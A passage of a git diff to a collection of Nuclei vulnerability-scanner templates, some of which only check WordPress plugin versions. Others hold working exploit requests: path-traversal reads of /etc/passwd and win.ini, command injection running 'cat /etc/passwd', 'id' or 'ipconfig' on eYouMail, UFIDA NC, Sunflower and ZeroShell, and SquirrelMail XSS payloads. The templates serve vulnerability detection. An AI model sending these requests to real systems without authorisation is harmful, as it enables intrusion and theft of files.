cve-id: CVE-2024-5638 + metadata: + fofa-query: "wp-content/themes/formula/" + google-query: inurl:"/wp-content/themes/formula/" + shodan-query: 'vuln:CVE-2024-5638' + tags: cve,wordpress,wp-theme,formula,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/formula/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formula" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5654.yaml b/poc/cve/CVE-2024-5654.yaml new file mode 100644 index 0000000000..c976d4f62b --- /dev/null +++ b/poc/cve/CVE-2024-5654.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5654 + +info: + name: > + CF7 Google Sheets Connector <= 5.0.9 - Missing Authorization to Limited Site Configuration Update + author: topscoder + severity: high + description: > + The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c0da4d55-5025-47cf-9f45-377d8943fc94?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-5654 + metadata: + fofa-query: "wp-content/plugins/cf7-google-sheets-connector/" + google-query: inurl:"/wp-content/plugins/cf7-google-sheets-connector/" + shodan-query: 'vuln:CVE-2024-5654' + tags: cve,wordpress,wp-plugin,cf7-google-sheets-connector,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-google-sheets-connector/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-google-sheets-connector" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5663.yaml b/poc/cve/CVE-2024-5663.yaml new file mode 100644 index 0000000000..fdf3f26b96 --- /dev/null +++ b/poc/cve/CVE-2024-5663.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5663 + +info: + name: > + Cards for Beaver Builder <= 1.1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Cards Widget + author: topscoder + severity: low + description: > + The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5663 + metadata: + fofa-query: "wp-content/plugins/bb-bootstrap-cards/" + google-query: inurl:"/wp-content/plugins/bb-bootstrap-cards/" + shodan-query: 'vuln:CVE-2024-5663' + tags: cve,wordpress,wp-plugin,bb-bootstrap-cards,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bb-bootstrap-cards/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bb-bootstrap-cards" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5758.yaml b/poc/cve/CVE-2024-5758.yaml new file mode 100644 index 0000000000..ca096c630a --- /dev/null +++ b/poc/cve/CVE-2024-5758.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5758 + +info: + name: > + Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.0.4 - Authenticated (Contributor+) Stored Cross=Site Scripting + author: topscoder + severity: low + description: > + The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5758 + metadata: + fofa-query: "wp-content/plugins/ultimate-post/" + google-query: inurl:"/wp-content/plugins/ultimate-post/" + shodan-query: 'vuln:CVE-2024-5758' + tags: cve,wordpress,wp-plugin,ultimate-post,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml b/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml new file mode 100644 index 0000000000..2c0e9068db --- /dev/null +++ b/poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4 + +info: + name: > + WP Force SSL & HTTPS SSL Redirect <= 1.66 - Missing Authorization to Settings Update + author: topscoder + severity: low + description: > + The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 4.2 + cve-id: CVE-2024-5770 + metadata: + fofa-query: "wp-content/plugins/wp-force-ssl/" + google-query: inurl:"/wp-content/plugins/wp-force-ssl/" + shodan-query: 'vuln:CVE-2024-5770' + tags: cve,wordpress,wp-plugin,wp-force-ssl,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-force-ssl/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-force-ssl" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.66') \ No newline at end of file diff --git a/poc/cve/cnvd-2018-13393-1037.yaml b/poc/cve/cnvd-2018-13393-1037.yaml index f215ee7764..0fd90a4a1c 100644 --- a/poc/cve/cnvd-2018-13393-1037.yaml +++ b/poc/cve/cnvd-2018-13393-1037.yaml @@ -1,16 +1,10 @@ id: CNVD-2018-13393 info: - name: Metinfo - Local File Inclusion + name: Metinfo LFI author: ritikchaddha severity: high - description: Metinfo is susceptible to local file inclusion. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 + reference: https://paper.seebug.org/676/ tags: metinfo,cnvd,cvnd2018,lfi requests: @@ -28,5 +22,3 @@ requests: - "(.*?)" - - "(.*?)" - condition: and - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-10543-1086.yaml b/poc/cve/cnvd-2021-10543-1086.yaml index 6f3f3af8f2..9a531cec67 100644 --- a/poc/cve/cnvd-2021-10543-1086.yaml +++ b/poc/cve/cnvd-2021-10543-1086.yaml @@ -1,17 +1,14 @@ id: CNVD-2021-10543 - info: name: EEA Information Disclosure author: pikpikcu severity: high reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure,cnvd,cnvd2021 - + tags: config,exposure,cnvd requests: - method: GET path: - "{{BaseURL}}/authenticationserverservlet" - matchers-condition: and matchers: - type: regex @@ -19,7 +16,6 @@ requests: - "(.*?)" - "(.*?)" condition: and - - type: status status: - 200 diff --git a/poc/cve/cnvd-2021-14536-1088.yaml b/poc/cve/cnvd-2021-14536-1087.yaml similarity index 100% rename from poc/cve/cnvd-2021-14536-1088.yaml rename to poc/cve/cnvd-2021-14536-1087.yaml diff --git a/poc/cve/cnvd-2021-15822-1089.yaml b/poc/cve/cnvd-2021-15822-1089.yaml deleted file mode 100644 index 2f90f49d59..0000000000 --- a/poc/cve/cnvd-2021-15822-1089.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CNVD-2021-15822 - -info: - name: ShopXO Download File Read - author: pikpikcu - severity: high - reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi - -requests: - - raw: - - | - GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-15822-1093.yaml b/poc/cve/cnvd-2021-15822-1093.yaml new file mode 100644 index 0000000000..761c3109f5 --- /dev/null +++ b/poc/cve/cnvd-2021-15822-1093.yaml @@ -0,0 +1,22 @@ +id: CNVD-2021-15822 +info: + name: ShopXO Download File Read + author: pikpikcu + severity: high + reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + tags: shopxo,lfi +requests: + - raw: + - | + GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cnvd-2021-15822-1095.yaml b/poc/cve/cnvd-2021-15822-1095.yaml index 761c3109f5..8b8f8eba47 100644 --- a/poc/cve/cnvd-2021-15822-1095.yaml +++ b/poc/cve/cnvd-2021-15822-1095.yaml @@ -4,19 +4,20 @@ info: author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi + tags: shopxo,lfi,cnvd,cnvd2021 requests: - raw: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/poc/cve/cnvd-2021-15824-1096.yaml b/poc/cve/cnvd-2021-15824-1097.yaml similarity index 100% rename from poc/cve/cnvd-2021-15824-1096.yaml rename to poc/cve/cnvd-2021-15824-1097.yaml diff --git a/poc/cve/cnvd-2021-17369-1102.yaml b/poc/cve/cnvd-2021-17369-1102.yaml index 43487027d3..367ab1a950 100644 --- a/poc/cve/cnvd-2021-17369-1102.yaml +++ b/poc/cve/cnvd-2021-17369-1102.yaml @@ -2,14 +2,8 @@ id: CNVD-2021-17369 info: name: Ruijie Smartweb Management System Password Information Disclosure author: pikpikcu - severity: high - description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege. - reference: - - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: medium + reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 tags: ruijie,disclosure,cnvd,cnvd2021 requests: - method: GET @@ -28,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/poc/cve/cnvd-2021-26422-1103.yaml b/poc/cve/cnvd-2021-26422-1103.yaml deleted file mode 100644 index 33197c44fe..0000000000 --- a/poc/cve/cnvd-2021-26422-1103.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CNVD-2021-26422 - -info: - name: eYouMail - Remote Code Execution - author: daffainfo - severity: critical - description: eYouMail is susceptible to a remote code execution vulnerability. - reference: - - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py - - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: eyoumail,rce,cnvd,cnvd2021 - -http: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# digest: 490a0046304402201ee36adf50f32ae67f64599b94d2b9dfa6a4a0094adc93f90ecab288cecc93290220254600764abc5267785430750c6f77bf40fe664896993a2fbcc0d779fc106ae8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cnvd-2021-28277-1105.yaml b/poc/cve/cnvd-2021-28277-1105.yaml new file mode 100644 index 0000000000..cbb2bb479f --- /dev/null +++ b/poc/cve/cnvd-2021-28277-1105.yaml @@ -0,0 +1,51 @@ +id: CNVD-2021-28277 + +info: + name: Landray-OA - Local File Inclusion + author: pikpikcu,daffainfo + severity: high + description: Landray-OA is susceptible to local file inclusion. + reference: + - https://www.aisoutu.com/a/1432457 + - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + metadata: + max-request: 2 + fofa-query: app="Landray OA system" + tags: landray,lfi,cnvd,cnvd2021 + +http: + - raw: + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///etc/passwd"}} + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///c://windows/win.ini"}} + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 + +# digest: 4a0a00473045022055ed57d6d24038e0c53a5a301192831ea1e2e562ada51eb178e08549e021db68022100d4c9e7513264a6ece808bd569d4d15d300d55b554bbf98f7016c1ab36c5e19e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cnvd-2021-28277-1107.yaml b/poc/cve/cnvd-2021-28277-1107.yaml index 5be02217e6..51f36fbda2 100644 --- a/poc/cve/cnvd-2021-28277-1107.yaml +++ b/poc/cve/cnvd-2021-28277-1107.yaml @@ -1,7 +1,6 @@ id: CNVD-2021-28277 - info: - name: Landray-OA Arbitrary File Download + name: Landray-OA Arbitrary - Arbitrary File Retrieval author: pikpikcu,daffainfo severity: high reference: @@ -10,7 +9,6 @@ info: metadata: fofa-query: app="Landray OA system" tags: landray,lfi,cnvd,cnvd2021 - requests: - raw: - | @@ -20,7 +18,6 @@ requests: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} - - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} @@ -28,17 +25,14 @@ requests: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} - stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/cve/cnvd-2021-30167-1108.yaml b/poc/cve/cnvd-2021-30167-1108.yaml deleted file mode 100644 index ed9600b3a9..0000000000 --- a/poc/cve/cnvd-2021-30167-1108.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CNVD-2021-30167 -info: - name: UFIDA NC BeanShell Remote Code Execution - author: pikpikcu - severity: high - reference: - - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd,cnvd2021 -requests: - - raw: - - | #linux - POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("id"); - - | #windows - POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("ipconfig"); - matchers-condition: and - matchers: - - type: regex - regex: - - "uid=" - - "Windows IP" - condition: or - - type: word - words: - - "BeanShell Test Servlet" - - type: status - status: - - 200 diff --git a/poc/cve/cnvd-2021-49104-1113.yaml b/poc/cve/cnvd-2021-49104-1114.yaml similarity index 100% rename from poc/cve/cnvd-2021-49104-1113.yaml rename to poc/cve/cnvd-2021-49104-1114.yaml diff --git a/poc/cve/cnvd-2022-03672-1116.yaml b/poc/cve/cnvd-2022-03672-1116.yaml new file mode 100644 index 0000000000..400f7dc2ad --- /dev/null +++ b/poc/cve/cnvd-2022-03672-1116.yaml @@ -0,0 +1,42 @@ +id: CNVD-2022-03672 + +info: + name: Sunflower Simple and Personal edition RCE + author: daffainfo + severity: critical + reference: + - https://www.1024sou.com/article/741374.html + - https://copyfuture.com/blogs-details/202202192249158884 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + tags: cnvd,cnvd2020,sunflower,rce + +requests: + - raw: + - | + POST /cgi-bin/rpc HTTP/1.1 + Host: {{Hostname}} + + action=verify-haras + - | + GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 + Host: {{Hostname}} + Cookie: CID={{cid}} + + extractors: + - type: regex + name: cid + internal: true + group: 1 + regex: + - '"verify_string":"(.*)"' + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1==200" + - "status_code_2==200" + - "contains(body_1, 'verify_string')" + - "contains(body_2, 'Windows IP')" + condition: and diff --git a/poc/cve/cnvd-2022-03672-1117.yaml b/poc/cve/cnvd-2022-03672-1117.yaml deleted file mode 100644 index b96b1bebfe..0000000000 --- a/poc/cve/cnvd-2022-03672-1117.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CNVD-2022-03672 -info: - name: Sunflower Simple and Personal - Remote Code Execution - author: daffainfo - severity: critical - description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. - reference: - - https://www.1024sou.com/article/741374.html - - https://copyfuture.com/blogs-details/202202192249158884 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: cnvd,cnvd2020,sunflower,rce -requests: - - raw: - - | - POST /cgi-bin/rpc HTTP/1.1 - Host: {{Hostname}} - - action=verify-haras - - | - GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 - Host: {{Hostname}} - Cookie: CID={{cid}} - extractors: - - type: regex - name: cid - internal: true - group: 1 - regex: - - '"verify_string":"(.*)"' - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1==200" - - "status_code_2==200" - - "contains(body_1, 'verify_string')" - - "contains(body_2, 'Windows IP')" - condition: and - -# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2000-0114-1297.yaml b/poc/cve/cve-2000-0114-1297.yaml new file mode 100644 index 0000000000..0050d0c90c --- /dev/null +++ b/poc/cve/cve-2000-0114-1297.yaml @@ -0,0 +1,32 @@ +id: CVE-2000-0114 + +info: + name: Microsoft FrontPage Extensions Check (shtml.dll) + author: r3naissance + severity: low + description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 + - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. + tags: cve,cve2000,frontpage,microsoft + +requests: + - method: GET + path: + - '{{BaseURL}}/_vti_inf.html' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/poc/cve/cve-2002-1131-1304.yaml b/poc/cve/cve-2002-1131-1304.yaml new file mode 100644 index 0000000000..676bc984a7 --- /dev/null +++ b/poc/cve/cve-2002-1131-1304.yaml @@ -0,0 +1,43 @@ +id: CVE-2002-1131 + +info: + name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities + author: dhiyaneshDk + severity: medium + description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: + - http://www.redhat.com/support/errata/RHSA-2002-204.html + - http://www.debian.org/security/2002/dsa-191 + - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774 + - https://www.exploit-db.com/exploits/21811 + - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html + - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/ + classification: + cve-id: CVE-2002-1131 + tags: xss,squirrelmail,cve,cve2002 + +requests: + - method: GET + path: + - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search' + - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search' + - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" diff --git a/poc/cve/cve-2007-4504-1342.yaml b/poc/cve/cve-2007-4504-1342.yaml deleted file mode 100644 index cd53fb2ce7..0000000000 --- a/poc/cve/cve-2007-4504-1342.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2007-4504 -info: - name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval - author: daffainfo - severity: high - description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. - reference: - - https://www.exploit-db.com/exploits/4307 - - https://www.cvedetails.com/cve/CVE-2007-4504 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - classification: - cve-id: CVE-2007-4504 - tags: cve,cve2007,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2008-6222.yaml b/poc/cve/cve-2008-6222.yaml new file mode 100644 index 0000000000..e1788f6280 --- /dev/null +++ b/poc/cve/cve-2008-6222.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-6222 + +info: + name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6980 + - https://www.cvedetails.com/cve/CVE-2008-6222 + - http://secunia.com/advisories/32523 + - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ + classification: + cve-id: CVE-2008-6222 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2008-6668-1400.yaml b/poc/cve/cve-2008-6668-1400.yaml deleted file mode 100644 index aa5fb3a3cc..0000000000 --- a/poc/cve/cve-2008-6668-1400.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2008-6668 -info: - name: nweb2fax <= 0.2.7 Directory Traversal - author: geeknik - severity: high - description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. - reference: - - https://www.exploit-db.com/exploits/5856 - - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - - http://www.securityfocus.com/bid/29804 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - classification: - cve-id: CVE-2008-6668 - tags: nweb2fax,lfi,cve,cve2008,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:.*:0:0:" diff --git a/poc/cve/cve-2009-0545.yaml b/poc/cve/cve-2009-0545.yaml new file mode 100644 index 0000000000..e1770bbbbf --- /dev/null +++ b/poc/cve/cve-2009-0545.yaml @@ -0,0 +1,40 @@ +id: CVE-2009-0545 + +info: + name: ZeroShell <= 1.0beta11 Remote Code Execution + author: geeknik + severity: critical + description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + remediation: | + Upgrade to a patched version of ZeroShell. + reference: + - https://www.exploit-db.com/exploits/8023 + - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 + - http://www.zeroshell.net/eng/announcements/ + - http://www.ikkisoft.com/stuff/LC-2009-01.txt + - http://www.vupen.com/english/advisories/2009/0385 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 + cve-id: CVE-2009-0545 + cwe-id: CWE-20 + epss-score: 0.97081 + epss-percentile: 0.99716 + cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zeroshell + product: zeroshell + tags: edb,cve,cve2009,zeroshell,kerbynet,rce + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" + + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" +# digest: 